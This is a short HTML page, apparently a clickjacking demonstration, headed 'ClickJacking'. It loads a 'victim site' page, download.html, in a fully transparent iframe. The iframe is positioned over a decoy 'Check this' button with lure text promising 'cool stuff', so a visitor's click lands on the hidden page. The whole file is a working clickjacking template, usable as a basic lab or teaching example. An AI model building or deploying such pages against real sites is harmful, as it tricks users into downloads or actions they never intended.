<!doctype html>
<html>

<head>
  <meta charset="UTF-8">
</head>

<body>

  <style>
    iframe {
      width: 400px;
      height: 400px;
      position: absolute;
      top: 45px;
      left: -14px;
      opacity: 0;
      z-index: 1;
    }
  </style>





  <div><h2>ClickJacking<h2></div>

  <!-- The url from the victim site -->
  <iframe src="download.html"></iframe>

  <button>Check this</button>
  <p>..Click the above link to see some cool stuff!!</p>

</body>
</html>